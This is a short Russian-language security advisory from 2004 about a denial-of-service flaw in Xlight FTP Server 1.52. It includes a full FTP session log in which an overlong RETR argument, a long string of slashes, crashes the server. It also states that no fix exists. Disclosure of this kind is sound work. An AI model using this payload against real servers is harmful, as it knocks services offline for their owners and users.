| Дата публикации: | 19.02.2004 |
| Всего просмотров: | 1416 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Xlight FTP Server 1.52
Описание: Уязвимость обнаружена в Xlight FTP Server. Удаленный авторизованный пользователь может аварийно завершить работу FTP сервера. Удаленный авторизованный пользователь может послать FTP RETR запрос с параметром более 260 байт, чтобы аварийно завершить работ FTP сервера. Пример/Эксплоит: ftp> open To 192.168.144.56 Connected to 192.168.144.56. 220 Xlight Server 1.52 ready... User (192.168.144.56:(none)): test 331 Password required for test Password: 230 Login OK. ftp> literal pasv 227 Entering passive mode (192,168,144,56,5,8) . ftp> literal retr ///////////////////////////////////////// /////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////// //////////////////////////////////////////qwer Connection closed by remote host. URL производителя: http://www.xlightftpd.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Xlight ftp server 1.52 RETR bug |